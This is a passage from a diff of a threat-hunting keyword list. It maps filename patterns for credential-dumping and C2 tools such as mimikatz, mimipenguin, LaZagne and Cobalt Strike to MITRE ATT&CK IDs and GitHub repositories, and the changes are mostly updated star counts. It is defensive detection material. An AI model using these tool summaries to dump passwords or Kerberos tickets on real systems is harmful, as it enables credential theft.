keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimikatz_x64.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mimikatz_x86.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MimikatzByPowerShellForDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - 
T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MimikatzOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1792","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" -"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1793","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" +"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimipenguin*","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3565","645","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" "*mimipenguin.*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*mimipenguin.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*mimipenguin.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" 
"*mimipenguin_x32.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*mimiRatz*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*mimishim.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*minidump*minikerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*minidump.* lsass.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality 
to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*Minidump.exe*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" 
